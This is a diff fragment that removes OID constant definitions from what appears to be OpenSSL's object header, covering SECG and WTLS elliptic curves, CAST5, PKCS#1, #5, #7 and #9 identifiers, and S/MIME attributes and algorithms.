-#define SN_secp128r1		"secp128r1"
-#define NID_secp128r1		706
-#define OBJ_secp128r1		OBJ_secg_ellipticCurve,28L
-
-#define SN_secp128r2		"secp128r2"
-#define NID_secp128r2		707
-#define OBJ_secp128r2		OBJ_secg_ellipticCurve,29L
-
-#define SN_secp160k1		"secp160k1"
-#define NID_secp160k1		708
-#define OBJ_secp160k1		OBJ_secg_ellipticCurve,9L
-
-#define SN_secp160r1		"secp160r1"
-#define NID_secp160r1		709
-#define OBJ_secp160r1		OBJ_secg_ellipticCurve,8L
-
-#define SN_secp160r2		"secp160r2"
-#define NID_secp160r2		710
-#define OBJ_secp160r2		OBJ_secg_ellipticCurve,30L
-
-#define SN_secp192k1		"secp192k1"
-#define NID_secp192k1		711
-#define OBJ_secp192k1		OBJ_secg_ellipticCurve,31L
-
-#define SN_secp224k1		"secp224k1"
-#define NID_secp224k1		712
-#define OBJ_secp224k1		OBJ_secg_ellipticCurve,32L
-
-#define SN_secp224r1		"secp224r1"
-#define NID_secp224r1		713
-#define OBJ_secp224r1		OBJ_secg_ellipticCurve,33L
-
-#define SN_secp256k1		"secp256k1"
-#define NID_secp256k1		714
-#define OBJ_secp256k1		OBJ_secg_ellipticCurve,10L
-
-#define SN_secp384r1		"secp384r1"
-#define NID_secp384r1		715
-#define OBJ_secp384r1		OBJ_secg_ellipticCurve,34L
-
-#define SN_secp521r1		"secp521r1"
-#define NID_secp521r1		716
-#define OBJ_secp521r1		OBJ_secg_ellipticCurve,35L
-
-#define SN_sect113r1		"sect113r1"
-#define NID_sect113r1		717
-#define OBJ_sect113r1		OBJ_secg_ellipticCurve,4L
-
-#define SN_sect113r2		"sect113r2"
-#define NID_sect113r2		718
-#define OBJ_sect113r2		OBJ_secg_ellipticCurve,5L
-
-#define SN_sect131r1		"sect131r1"
-#define NID_sect131r1		719
-#define OBJ_sect131r1		OBJ_secg_ellipticCurve,22L
-
-#define SN_sect131r2		"sect131r2"
-#define NID_sect131r2		720
-#define OBJ_sect131r2		OBJ_secg_ellipticCurve,23L
-
-#define SN_sect163k1		"sect163k1"
-#define NID_sect163k1		721
-#define OBJ_sect163k1		OBJ_secg_ellipticCurve,1L
-
-#define SN_sect163r1		"sect163r1"
-#define NID_sect163r1		722
-#define OBJ_sect163r1		OBJ_secg_ellipticCurve,2L
-
-#define SN_sect163r2		"sect163r2"
-#define NID_sect163r2		723
-#define OBJ_sect163r2		OBJ_secg_ellipticCurve,15L
-
-#define SN_sect193r1		"sect193r1"
-#define NID_sect193r1		724
-#define OBJ_sect193r1		OBJ_secg_ellipticCurve,24L
-
-#define SN_sect193r2		"sect193r2"
-#define NID_sect193r2		725
-#define OBJ_sect193r2		OBJ_secg_ellipticCurve,25L
-
-#define SN_sect233k1		"sect233k1"
-#define NID_sect233k1		726
-#define OBJ_sect233k1		OBJ_secg_ellipticCurve,26L
-
-#define SN_sect233r1		"sect233r1"
-#define NID_sect233r1		727
-#define OBJ_sect233r1		OBJ_secg_ellipticCurve,27L
-
-#define SN_sect239k1		"sect239k1"
-#define NID_sect239k1		728
-#define OBJ_sect239k1		OBJ_secg_ellipticCurve,3L
-
-#define SN_sect283k1		"sect283k1"
-#define NID_sect283k1		729
-#define OBJ_sect283k1		OBJ_secg_ellipticCurve,16L
-
-#define SN_sect283r1		"sect283r1"
-#define NID_sect283r1		730
-#define OBJ_sect283r1		OBJ_secg_ellipticCurve,17L
-
-#define SN_sect409k1		"sect409k1"
-#define NID_sect409k1		731
-#define OBJ_sect409k1		OBJ_secg_ellipticCurve,36L
-
-#define SN_sect409r1		"sect409r1"
-#define NID_sect409r1		732
-#define OBJ_sect409r1		OBJ_secg_ellipticCurve,37L
-
-#define SN_sect571k1		"sect571k1"
-#define NID_sect571k1		733
-#define OBJ_sect571k1		OBJ_secg_ellipticCurve,38L
-
-#define SN_sect571r1		"sect571r1"
-#define NID_sect571r1		734
-#define OBJ_sect571r1		OBJ_secg_ellipticCurve,39L
-
-#define OBJ_wap_wsg_idm_ecid		OBJ_wap_wsg,4L
-
-#define SN_wap_wsg_idm_ecid_wtls1		"wap-wsg-idm-ecid-wtls1"
-#define NID_wap_wsg_idm_ecid_wtls1		735
-#define OBJ_wap_wsg_idm_ecid_wtls1		OBJ_wap_wsg_idm_ecid,1L
-
-#define SN_wap_wsg_idm_ecid_wtls3		"wap-wsg-idm-ecid-wtls3"
-#define NID_wap_wsg_idm_ecid_wtls3		736
-#define OBJ_wap_wsg_idm_ecid_wtls3		OBJ_wap_wsg_idm_ecid,3L
-
-#define SN_wap_wsg_idm_ecid_wtls4		"wap-wsg-idm-ecid-wtls4"
-#define NID_wap_wsg_idm_ecid_wtls4		737
-#define OBJ_wap_wsg_idm_ecid_wtls4		OBJ_wap_wsg_idm_ecid,4L
-
-#define SN_wap_wsg_idm_ecid_wtls5		"wap-wsg-idm-ecid-wtls5"
-#define NID_wap_wsg_idm_ecid_wtls5		738
-#define OBJ_wap_wsg_idm_ecid_wtls5		OBJ_wap_wsg_idm_ecid,5L
-
-#define SN_wap_wsg_idm_ecid_wtls6		"wap-wsg-idm-ecid-wtls6"
-#define NID_wap_wsg_idm_ecid_wtls6		739
-#define OBJ_wap_wsg_idm_ecid_wtls6		OBJ_wap_wsg_idm_ecid,6L
-
-#define SN_wap_wsg_idm_ecid_wtls7		"wap-wsg-idm-ecid-wtls7"
-#define NID_wap_wsg_idm_ecid_wtls7		740
-#define OBJ_wap_wsg_idm_ecid_wtls7		OBJ_wap_wsg_idm_ecid,7L
-
-#define SN_wap_wsg_idm_ecid_wtls8		"wap-wsg-idm-ecid-wtls8"
-#define NID_wap_wsg_idm_ecid_wtls8		741
-#define OBJ_wap_wsg_idm_ecid_wtls8		OBJ_wap_wsg_idm_ecid,8L
-
-#define SN_wap_wsg_idm_ecid_wtls9		"wap-wsg-idm-ecid-wtls9"
-#define NID_wap_wsg_idm_ecid_wtls9		742
-#define OBJ_wap_wsg_idm_ecid_wtls9		OBJ_wap_wsg_idm_ecid,9L
-
-#define SN_wap_wsg_idm_ecid_wtls10		"wap-wsg-idm-ecid-wtls10"
-#define NID_wap_wsg_idm_ecid_wtls10		743
-#define OBJ_wap_wsg_idm_ecid_wtls10		OBJ_wap_wsg_idm_ecid,10L
-
-#define SN_wap_wsg_idm_ecid_wtls11		"wap-wsg-idm-ecid-wtls11"
-#define NID_wap_wsg_idm_ecid_wtls11		744
-#define OBJ_wap_wsg_idm_ecid_wtls11		OBJ_wap_wsg_idm_ecid,11L
-
-#define SN_wap_wsg_idm_ecid_wtls12		"wap-wsg-idm-ecid-wtls12"
-#define NID_wap_wsg_idm_ecid_wtls12		745
-#define OBJ_wap_wsg_idm_ecid_wtls12		OBJ_wap_wsg_idm_ecid,12L
-
-#define SN_cast5_cbc		"CAST5-CBC"
-#define LN_cast5_cbc		"cast5-cbc"
-#define NID_cast5_cbc		108
-#define OBJ_cast5_cbc		OBJ_ISO_US,113533L,7L,66L,10L
-
-#define SN_cast5_ecb		"CAST5-ECB"
-#define LN_cast5_ecb		"cast5-ecb"
-#define NID_cast5_ecb		109
-
-#define SN_cast5_cfb64		"CAST5-CFB"
-#define LN_cast5_cfb64		"cast5-cfb"
-#define NID_cast5_cfb64		110
-
-#define SN_cast5_ofb64		"CAST5-OFB"
-#define LN_cast5_ofb64		"cast5-ofb"
-#define NID_cast5_ofb64		111
-
-#define LN_pbeWithMD5AndCast5_CBC		"pbeWithMD5AndCast5CBC"
-#define NID_pbeWithMD5AndCast5_CBC		112
-#define OBJ_pbeWithMD5AndCast5_CBC		OBJ_ISO_US,113533L,7L,66L,12L
-
-#define SN_id_PasswordBasedMAC		"id-PasswordBasedMAC"
-#define LN_id_PasswordBasedMAC		"password based MAC"
-#define NID_id_PasswordBasedMAC		782
-#define OBJ_id_PasswordBasedMAC		OBJ_ISO_US,113533L,7L,66L,13L
-
-#define SN_id_DHBasedMac		"id-DHBasedMac"
-#define LN_id_DHBasedMac		"Diffie-Hellman based MAC"
-#define NID_id_DHBasedMac		783
-#define OBJ_id_DHBasedMac		OBJ_ISO_US,113533L,7L,66L,30L
-
-#define SN_rsadsi		"rsadsi"
-#define LN_rsadsi		"RSA Data Security, Inc."
-#define NID_rsadsi		1
-#define OBJ_rsadsi		OBJ_ISO_US,113549L
-
-#define SN_pkcs		"pkcs"
-#define LN_pkcs		"RSA Data Security, Inc. PKCS"
-#define NID_pkcs		2
-#define OBJ_pkcs		OBJ_rsadsi,1L
-
-#define SN_pkcs1		"pkcs1"
-#define NID_pkcs1		186
-#define OBJ_pkcs1		OBJ_pkcs,1L
-
-#define LN_rsaEncryption		"rsaEncryption"
-#define NID_rsaEncryption		6
-#define OBJ_rsaEncryption		OBJ_pkcs1,1L
-
-#define SN_md2WithRSAEncryption		"RSA-MD2"
-#define LN_md2WithRSAEncryption		"md2WithRSAEncryption"
-#define NID_md2WithRSAEncryption		7
-#define OBJ_md2WithRSAEncryption		OBJ_pkcs1,2L
-
-#define SN_md4WithRSAEncryption		"RSA-MD4"
-#define LN_md4WithRSAEncryption		"md4WithRSAEncryption"
-#define NID_md4WithRSAEncryption		396
-#define OBJ_md4WithRSAEncryption		OBJ_pkcs1,3L
-
-#define SN_md5WithRSAEncryption		"RSA-MD5"
-#define LN_md5WithRSAEncryption		"md5WithRSAEncryption"
-#define NID_md5WithRSAEncryption		8
-#define OBJ_md5WithRSAEncryption		OBJ_pkcs1,4L
-
-#define SN_sha1WithRSAEncryption		"RSA-SHA1"
-#define LN_sha1WithRSAEncryption		"sha1WithRSAEncryption"
-#define NID_sha1WithRSAEncryption		65
-#define OBJ_sha1WithRSAEncryption		OBJ_pkcs1,5L
-
-#define SN_rsaesOaep		"RSAES-OAEP"
-#define LN_rsaesOaep		"rsaesOaep"
-#define NID_rsaesOaep		919
-#define OBJ_rsaesOaep		OBJ_pkcs1,7L
-
-#define SN_mgf1		"MGF1"
-#define LN_mgf1		"mgf1"
-#define NID_mgf1		911
-#define OBJ_mgf1		OBJ_pkcs1,8L
-
-#define SN_rsassaPss		"RSASSA-PSS"
-#define LN_rsassaPss		"rsassaPss"
-#define NID_rsassaPss		912
-#define OBJ_rsassaPss		OBJ_pkcs1,10L
-
-#define SN_sha256WithRSAEncryption		"RSA-SHA256"
-#define LN_sha256WithRSAEncryption		"sha256WithRSAEncryption"
-#define NID_sha256WithRSAEncryption		668
-#define OBJ_sha256WithRSAEncryption		OBJ_pkcs1,11L
-
-#define SN_sha384WithRSAEncryption		"RSA-SHA384"
-#define LN_sha384WithRSAEncryption		"sha384WithRSAEncryption"
-#define NID_sha384WithRSAEncryption		669
-#define OBJ_sha384WithRSAEncryption		OBJ_pkcs1,12L
-
-#define SN_sha512WithRSAEncryption		"RSA-SHA512"
-#define LN_sha512WithRSAEncryption		"sha512WithRSAEncryption"
-#define NID_sha512WithRSAEncryption		670
-#define OBJ_sha512WithRSAEncryption		OBJ_pkcs1,13L
-
-#define SN_sha224WithRSAEncryption		"RSA-SHA224"
-#define LN_sha224WithRSAEncryption		"sha224WithRSAEncryption"
-#define NID_sha224WithRSAEncryption		671
-#define OBJ_sha224WithRSAEncryption		OBJ_pkcs1,14L
-
-#define SN_pkcs3		"pkcs3"
-#define NID_pkcs3		27
-#define OBJ_pkcs3		OBJ_pkcs,3L
-
-#define LN_dhKeyAgreement		"dhKeyAgreement"
-#define NID_dhKeyAgreement		28
-#define OBJ_dhKeyAgreement		OBJ_pkcs3,1L
-
-#define SN_pkcs5		"pkcs5"
-#define NID_pkcs5		187
-#define OBJ_pkcs5		OBJ_pkcs,5L
-
-#define SN_pbeWithMD2AndDES_CBC		"PBE-MD2-DES"
-#define LN_pbeWithMD2AndDES_CBC		"pbeWithMD2AndDES-CBC"
-#define NID_pbeWithMD2AndDES_CBC		9
-#define OBJ_pbeWithMD2AndDES_CBC		OBJ_pkcs5,1L
-
-#define SN_pbeWithMD5AndDES_CBC		"PBE-MD5-DES"
-#define LN_pbeWithMD5AndDES_CBC		"pbeWithMD5AndDES-CBC"
-#define NID_pbeWithMD5AndDES_CBC		10
-#define OBJ_pbeWithMD5AndDES_CBC		OBJ_pkcs5,3L
-
-#define SN_pbeWithMD2AndRC2_CBC		"PBE-MD2-RC2-64"
-#define LN_pbeWithMD2AndRC2_CBC		"pbeWithMD2AndRC2-CBC"
-#define NID_pbeWithMD2AndRC2_CBC		168
-#define OBJ_pbeWithMD2AndRC2_CBC		OBJ_pkcs5,4L
-
-#define SN_pbeWithMD5AndRC2_CBC		"PBE-MD5-RC2-64"
-#define LN_pbeWithMD5AndRC2_CBC		"pbeWithMD5AndRC2-CBC"
-#define NID_pbeWithMD5AndRC2_CBC		169
-#define OBJ_pbeWithMD5AndRC2_CBC		OBJ_pkcs5,6L
-
-#define SN_pbeWithSHA1AndDES_CBC		"PBE-SHA1-DES"
-#define LN_pbeWithSHA1AndDES_CBC		"pbeWithSHA1AndDES-CBC"
-#define NID_pbeWithSHA1AndDES_CBC		170
-#define OBJ_pbeWithSHA1AndDES_CBC		OBJ_pkcs5,10L
-
-#define SN_pbeWithSHA1AndRC2_CBC		"PBE-SHA1-RC2-64"
-#define LN_pbeWithSHA1AndRC2_CBC		"pbeWithSHA1AndRC2-CBC"
-#define NID_pbeWithSHA1AndRC2_CBC		68
-#define OBJ_pbeWithSHA1AndRC2_CBC		OBJ_pkcs5,11L
-
-#define LN_id_pbkdf2		"PBKDF2"
-#define NID_id_pbkdf2		69
-#define OBJ_id_pbkdf2		OBJ_pkcs5,12L
-
-#define LN_pbes2		"PBES2"
-#define NID_pbes2		161
-#define OBJ_pbes2		OBJ_pkcs5,13L
-
-#define LN_pbmac1		"PBMAC1"
-#define NID_pbmac1		162
-#define OBJ_pbmac1		OBJ_pkcs5,14L
-
-#define SN_pkcs7		"pkcs7"
-#define NID_pkcs7		20
-#define OBJ_pkcs7		OBJ_pkcs,7L
-
-#define LN_pkcs7_data		"pkcs7-data"
-#define NID_pkcs7_data		21
-#define OBJ_pkcs7_data		OBJ_pkcs7,1L
-
-#define LN_pkcs7_signed		"pkcs7-signedData"
-#define NID_pkcs7_signed		22
-#define OBJ_pkcs7_signed		OBJ_pkcs7,2L
-
-#define LN_pkcs7_enveloped		"pkcs7-envelopedData"
-#define NID_pkcs7_enveloped		23
-#define OBJ_pkcs7_enveloped		OBJ_pkcs7,3L
-
-#define LN_pkcs7_signedAndEnveloped		"pkcs7-signedAndEnvelopedData"
-#define NID_pkcs7_signedAndEnveloped		24
-#define OBJ_pkcs7_signedAndEnveloped		OBJ_pkcs7,4L
-
-#define LN_pkcs7_digest		"pkcs7-digestData"
-#define NID_pkcs7_digest		25
-#define OBJ_pkcs7_digest		OBJ_pkcs7,5L
-
-#define LN_pkcs7_encrypted		"pkcs7-encryptedData"
-#define NID_pkcs7_encrypted		26
-#define OBJ_pkcs7_encrypted		OBJ_pkcs7,6L
-
-#define SN_pkcs9		"pkcs9"
-#define NID_pkcs9		47
-#define OBJ_pkcs9		OBJ_pkcs,9L
-
-#define LN_pkcs9_emailAddress		"emailAddress"
-#define NID_pkcs9_emailAddress		48
-#define OBJ_pkcs9_emailAddress		OBJ_pkcs9,1L
-
-#define LN_pkcs9_unstructuredName		"unstructuredName"
-#define NID_pkcs9_unstructuredName		49
-#define OBJ_pkcs9_unstructuredName		OBJ_pkcs9,2L
-
-#define LN_pkcs9_contentType		"contentType"
-#define NID_pkcs9_contentType		50
-#define OBJ_pkcs9_contentType		OBJ_pkcs9,3L
-
-#define LN_pkcs9_messageDigest		"messageDigest"
-#define NID_pkcs9_messageDigest		51
-#define OBJ_pkcs9_messageDigest		OBJ_pkcs9,4L
-
-#define LN_pkcs9_signingTime		"signingTime"
-#define NID_pkcs9_signingTime		52
-#define OBJ_pkcs9_signingTime		OBJ_pkcs9,5L
-
-#define LN_pkcs9_countersignature		"countersignature"
-#define NID_pkcs9_countersignature		53
-#define OBJ_pkcs9_countersignature		OBJ_pkcs9,6L
-
-#define LN_pkcs9_challengePassword		"challengePassword"
-#define NID_pkcs9_challengePassword		54
-#define OBJ_pkcs9_challengePassword		OBJ_pkcs9,7L
-
-#define LN_pkcs9_unstructuredAddress		"unstructuredAddress"
-#define NID_pkcs9_unstructuredAddress		55
-#define OBJ_pkcs9_unstructuredAddress		OBJ_pkcs9,8L
-
-#define LN_pkcs9_extCertAttributes		"extendedCertificateAttributes"
-#define NID_pkcs9_extCertAttributes		56
-#define OBJ_pkcs9_extCertAttributes		OBJ_pkcs9,9L
-
-#define SN_ext_req		"extReq"
-#define LN_ext_req		"Extension Request"
-#define NID_ext_req		172
-#define OBJ_ext_req		OBJ_pkcs9,14L
-
-#define SN_SMIMECapabilities		"SMIME-CAPS"
-#define LN_SMIMECapabilities		"S/MIME Capabilities"
-#define NID_SMIMECapabilities		167
-#define OBJ_SMIMECapabilities		OBJ_pkcs9,15L
-
-#define SN_SMIME		"SMIME"
-#define LN_SMIME		"S/MIME"
-#define NID_SMIME		188
-#define OBJ_SMIME		OBJ_pkcs9,16L
-
-#define SN_id_smime_mod		"id-smime-mod"
-#define NID_id_smime_mod		189
-#define OBJ_id_smime_mod		OBJ_SMIME,0L
-
-#define SN_id_smime_ct		"id-smime-ct"
-#define NID_id_smime_ct		190
-#define OBJ_id_smime_ct		OBJ_SMIME,1L
-
-#define SN_id_smime_aa		"id-smime-aa"
-#define NID_id_smime_aa		191
-#define OBJ_id_smime_aa		OBJ_SMIME,2L
-
-#define SN_id_smime_alg		"id-smime-alg"
-#define NID_id_smime_alg		192
-#define OBJ_id_smime_alg		OBJ_SMIME,3L
-
-#define SN_id_smime_cd		"id-smime-cd"
-#define NID_id_smime_cd		193
-#define OBJ_id_smime_cd		OBJ_SMIME,4L
-
-#define SN_id_smime_spq		"id-smime-spq"
-#define NID_id_smime_spq		194
-#define OBJ_id_smime_spq		OBJ_SMIME,5L
-
-#define SN_id_smime_cti		"id-smime-cti"
-#define NID_id_smime_cti		195
-#define OBJ_id_smime_cti		OBJ_SMIME,6L
-
-#define SN_id_smime_mod_cms		"id-smime-mod-cms"
-#define NID_id_smime_mod_cms		196
-#define OBJ_id_smime_mod_cms		OBJ_id_smime_mod,1L
-
-#define SN_id_smime_mod_ess		"id-smime-mod-ess"
-#define NID_id_smime_mod_ess		197
-#define OBJ_id_smime_mod_ess		OBJ_id_smime_mod,2L
-
-#define SN_id_smime_mod_oid		"id-smime-mod-oid"
-#define NID_id_smime_mod_oid		198
-#define OBJ_id_smime_mod_oid		OBJ_id_smime_mod,3L
-
-#define SN_id_smime_mod_msg_v3		"id-smime-mod-msg-v3"
-#define NID_id_smime_mod_msg_v3		199
-#define OBJ_id_smime_mod_msg_v3		OBJ_id_smime_mod,4L
-
-#define SN_id_smime_mod_ets_eSignature_88		"id-smime-mod-ets-eSignature-88"
-#define NID_id_smime_mod_ets_eSignature_88		200
-#define OBJ_id_smime_mod_ets_eSignature_88		OBJ_id_smime_mod,5L
-
-#define SN_id_smime_mod_ets_eSignature_97		"id-smime-mod-ets-eSignature-97"
-#define NID_id_smime_mod_ets_eSignature_97		201
-#define OBJ_id_smime_mod_ets_eSignature_97		OBJ_id_smime_mod,6L
-
-#define SN_id_smime_mod_ets_eSigPolicy_88		"id-smime-mod-ets-eSigPolicy-88"
-#define NID_id_smime_mod_ets_eSigPolicy_88		202
-#define OBJ_id_smime_mod_ets_eSigPolicy_88		OBJ_id_smime_mod,7L
-
-#define SN_id_smime_mod_ets_eSigPolicy_97		"id-smime-mod-ets-eSigPolicy-97"
-#define NID_id_smime_mod_ets_eSigPolicy_97		203
-#define OBJ_id_smime_mod_ets_eSigPolicy_97		OBJ_id_smime_mod,8L
-
-#define SN_id_smime_ct_receipt		"id-smime-ct-receipt"
-#define NID_id_smime_ct_receipt		204
-#define OBJ_id_smime_ct_receipt		OBJ_id_smime_ct,1L
-
-#define SN_id_smime_ct_authData		"id-smime-ct-authData"
-#define NID_id_smime_ct_authData		205
-#define OBJ_id_smime_ct_authData		OBJ_id_smime_ct,2L
-
-#define SN_id_smime_ct_publishCert		"id-smime-ct-publishCert"
-#define NID_id_smime_ct_publishCert		206
-#define OBJ_id_smime_ct_publishCert		OBJ_id_smime_ct,3L
-
-#define SN_id_smime_ct_TSTInfo		"id-smime-ct-TSTInfo"
-#define NID_id_smime_ct_TSTInfo		207
-#define OBJ_id_smime_ct_TSTInfo		OBJ_id_smime_ct,4L
-
-#define SN_id_smime_ct_TDTInfo		"id-smime-ct-TDTInfo"
-#define NID_id_smime_ct_TDTInfo		208
-#define OBJ_id_smime_ct_TDTInfo		OBJ_id_smime_ct,5L
-
-#define SN_id_smime_ct_contentInfo		"id-smime-ct-contentInfo"
-#define NID_id_smime_ct_contentInfo		209
-#define OBJ_id_smime_ct_contentInfo		OBJ_id_smime_ct,6L
-
-#define SN_id_smime_ct_DVCSRequestData		"id-smime-ct-DVCSRequestData"
-#define NID_id_smime_ct_DVCSRequestData		210
-#define OBJ_id_smime_ct_DVCSRequestData		OBJ_id_smime_ct,7L
-
-#define SN_id_smime_ct_DVCSResponseData		"id-smime-ct-DVCSResponseData"
-#define NID_id_smime_ct_DVCSResponseData		211
-#define OBJ_id_smime_ct_DVCSResponseData		OBJ_id_smime_ct,8L
-
-#define SN_id_smime_ct_compressedData		"id-smime-ct-compressedData"
-#define NID_id_smime_ct_compressedData		786
-#define OBJ_id_smime_ct_compressedData		OBJ_id_smime_ct,9L
-
-#define SN_id_ct_asciiTextWithCRLF		"id-ct-asciiTextWithCRLF"
-#define NID_id_ct_asciiTextWithCRLF		787
-#define OBJ_id_ct_asciiTextWithCRLF		OBJ_id_smime_ct,27L
-
-#define SN_id_smime_aa_receiptRequest		"id-smime-aa-receiptRequest"
-#define NID_id_smime_aa_receiptRequest		212
-#define OBJ_id_smime_aa_receiptRequest		OBJ_id_smime_aa,1L
-
-#define SN_id_smime_aa_securityLabel		"id-smime-aa-securityLabel"
-#define NID_id_smime_aa_securityLabel		213
-#define OBJ_id_smime_aa_securityLabel		OBJ_id_smime_aa,2L
-
-#define SN_id_smime_aa_mlExpandHistory		"id-smime-aa-mlExpandHistory"
-#define NID_id_smime_aa_mlExpandHistory		214
-#define OBJ_id_smime_aa_mlExpandHistory		OBJ_id_smime_aa,3L
-
-#define SN_id_smime_aa_contentHint		"id-smime-aa-contentHint"
-#define NID_id_smime_aa_contentHint		215
-#define OBJ_id_smime_aa_contentHint		OBJ_id_smime_aa,4L
-
-#define SN_id_smime_aa_msgSigDigest		"id-smime-aa-msgSigDigest"
-#define NID_id_smime_aa_msgSigDigest		216
-#define OBJ_id_smime_aa_msgSigDigest		OBJ_id_smime_aa,5L
-
-#define SN_id_smime_aa_encapContentType		"id-smime-aa-encapContentType"
-#define NID_id_smime_aa_encapContentType		217
-#define OBJ_id_smime_aa_encapContentType		OBJ_id_smime_aa,6L
-
-#define SN_id_smime_aa_contentIdentifier		"id-smime-aa-contentIdentifier"
-#define NID_id_smime_aa_contentIdentifier		218
-#define OBJ_id_smime_aa_contentIdentifier		OBJ_id_smime_aa,7L
-
-#define SN_id_smime_aa_macValue		"id-smime-aa-macValue"
-#define NID_id_smime_aa_macValue		219
-#define OBJ_id_smime_aa_macValue		OBJ_id_smime_aa,8L
-
-#define SN_id_smime_aa_equivalentLabels		"id-smime-aa-equivalentLabels"
-#define NID_id_smime_aa_equivalentLabels		220
-#define OBJ_id_smime_aa_equivalentLabels		OBJ_id_smime_aa,9L
-
-#define SN_id_smime_aa_contentReference		"id-smime-aa-contentReference"
-#define NID_id_smime_aa_contentReference		221
-#define OBJ_id_smime_aa_contentReference		OBJ_id_smime_aa,10L
-
-#define SN_id_smime_aa_encrypKeyPref		"id-smime-aa-encrypKeyPref"
-#define NID_id_smime_aa_encrypKeyPref		222
-#define OBJ_id_smime_aa_encrypKeyPref		OBJ_id_smime_aa,11L
-
-#define SN_id_smime_aa_signingCertificate		"id-smime-aa-signingCertificate"
-#define NID_id_smime_aa_signingCertificate		223
-#define OBJ_id_smime_aa_signingCertificate		OBJ_id_smime_aa,12L
-
-#define SN_id_smime_aa_smimeEncryptCerts		"id-smime-aa-smimeEncryptCerts"
-#define NID_id_smime_aa_smimeEncryptCerts		224
-#define OBJ_id_smime_aa_smimeEncryptCerts		OBJ_id_smime_aa,13L
-
-#define SN_id_smime_aa_timeStampToken		"id-smime-aa-timeStampToken"
-#define NID_id_smime_aa_timeStampToken		225
-#define OBJ_id_smime_aa_timeStampToken		OBJ_id_smime_aa,14L
-
-#define SN_id_smime_aa_ets_sigPolicyId		"id-smime-aa-ets-sigPolicyId"
-#define NID_id_smime_aa_ets_sigPolicyId		226
-#define OBJ_id_smime_aa_ets_sigPolicyId		OBJ_id_smime_aa,15L
-
-#define SN_id_smime_aa_ets_commitmentType		"id-smime-aa-ets-commitmentType"
-#define NID_id_smime_aa_ets_commitmentType		227
-#define OBJ_id_smime_aa_ets_commitmentType		OBJ_id_smime_aa,16L
-
-#define SN_id_smime_aa_ets_signerLocation		"id-smime-aa-ets-signerLocation"
-#define NID_id_smime_aa_ets_signerLocation		228
-#define OBJ_id_smime_aa_ets_signerLocation		OBJ_id_smime_aa,17L
-
-#define SN_id_smime_aa_ets_signerAttr		"id-smime-aa-ets-signerAttr"
-#define NID_id_smime_aa_ets_signerAttr		229
-#define OBJ_id_smime_aa_ets_signerAttr		OBJ_id_smime_aa,18L
-
-#define SN_id_smime_aa_ets_otherSigCert		"id-smime-aa-ets-otherSigCert"
-#define NID_id_smime_aa_ets_otherSigCert		230
-#define OBJ_id_smime_aa_ets_otherSigCert		OBJ_id_smime_aa,19L
-
-#define SN_id_smime_aa_ets_contentTimestamp		"id-smime-aa-ets-contentTimestamp"
-#define NID_id_smime_aa_ets_contentTimestamp		231
-#define OBJ_id_smime_aa_ets_contentTimestamp		OBJ_id_smime_aa,20L
-
-#define SN_id_smime_aa_ets_CertificateRefs		"id-smime-aa-ets-CertificateRefs"
-#define NID_id_smime_aa_ets_CertificateRefs		232
-#define OBJ_id_smime_aa_ets_CertificateRefs		OBJ_id_smime_aa,21L
-
-#define SN_id_smime_aa_ets_RevocationRefs		"id-smime-aa-ets-RevocationRefs"
-#define NID_id_smime_aa_ets_RevocationRefs		233
-#define OBJ_id_smime_aa_ets_RevocationRefs		OBJ_id_smime_aa,22L
-
-#define SN_id_smime_aa_ets_certValues		"id-smime-aa-ets-certValues"
-#define NID_id_smime_aa_ets_certValues		234
-#define OBJ_id_smime_aa_ets_certValues		OBJ_id_smime_aa,23L
-
-#define SN_id_smime_aa_ets_revocationValues		"id-smime-aa-ets-revocationValues"
-#define NID_id_smime_aa_ets_revocationValues		235
-#define OBJ_id_smime_aa_ets_revocationValues		OBJ_id_smime_aa,24L
-
-#define SN_id_smime_aa_ets_escTimeStamp		"id-smime-aa-ets-escTimeStamp"
-#define NID_id_smime_aa_ets_escTimeStamp		236
-#define OBJ_id_smime_aa_ets_escTimeStamp		OBJ_id_smime_aa,25L
-
-#define SN_id_smime_aa_ets_certCRLTimestamp		"id-smime-aa-ets-certCRLTimestamp"
-#define NID_id_smime_aa_ets_certCRLTimestamp		237
-#define OBJ_id_smime_aa_ets_certCRLTimestamp		OBJ_id_smime_aa,26L
-
-#define SN_id_smime_aa_ets_archiveTimeStamp		"id-smime-aa-ets-archiveTimeStamp"
-#define NID_id_smime_aa_ets_archiveTimeStamp		238
-#define OBJ_id_smime_aa_ets_archiveTimeStamp		OBJ_id_smime_aa,27L
-
-#define SN_id_smime_aa_signatureType		"id-smime-aa-signatureType"
-#define NID_id_smime_aa_signatureType		239
-#define OBJ_id_smime_aa_signatureType		OBJ_id_smime_aa,28L
-
-#define SN_id_smime_aa_dvcs_dvc		"id-smime-aa-dvcs-dvc"
-#define NID_id_smime_aa_dvcs_dvc		240
-#define OBJ_id_smime_aa_dvcs_dvc		OBJ_id_smime_aa,29L
-
-#define SN_id_smime_alg_ESDHwith3DES		"id-smime-alg-ESDHwith3DES"
-#define NID_id_smime_alg_ESDHwith3DES		241
-#define OBJ_id_smime_alg_ESDHwith3DES		OBJ_id_smime_alg,1L
-
-#define SN_id_smime_alg_ESDHwithRC2		"id-smime-alg-ESDHwithRC2"
-#define NID_id_smime_alg_ESDHwithRC2		242
-#define OBJ_id_smime_alg_ESDHwithRC2		OBJ_id_smime_alg,2L
-
-#define SN_id_smime_alg_3DESwrap		"id-smime-alg-3DESwrap"
-#define NID_id_smime_alg_3DESwrap		243
-#define OBJ_id_smime_alg_3DESwrap		OBJ_id_smime_alg,3L
-
-#define SN_id_smime_alg_RC2wrap		"id-smime-alg-RC2wrap"
-#define NID_id_smime_alg_RC2wrap		244
-#define OBJ_id_smime_alg_RC2wrap		OBJ_id_smime_alg,4L
-
-#define SN_id_smime_alg_ESDH		"id-smime-alg-ESDH"
-#define NID_id_smime_alg_ESDH		245
-#define OBJ_id_smime_alg_ESDH		OBJ_id_smime_alg,5L
-
-#define SN_id_smime_alg_CMS3DESwrap		"id-smime-alg-CMS3DESwrap"
-#define NID_id_smime_alg_CMS3DESwrap		246
-#define OBJ_id_smime_alg_CMS3DESwrap		OBJ_id_smime_alg,6L
-
-#define SN_id_smime_alg_CMSRC2wrap		"id-smime-alg-CMSRC2wrap"
-#define NID_id_smime_alg_CMSRC2wrap		247
-#define OBJ_id_smime_alg_CMSRC2wrap		OBJ_id_smime_alg,7L
-
-#define SN_id_alg_PWRI_KEK		"id-alg-PWRI-KEK"
-#define NID_id_alg_PWRI_KEK		893
-#define OBJ_id_alg_PWRI_KEK		OBJ_id_smime_alg,9L
-
-#define SN_id_smime_cd_ldap		"id-smime-cd-ldap"
-#define NID_id_smime_cd_ldap		248
-#define OBJ_id_smime_cd_ldap		OBJ_id_smime_cd,1L
-
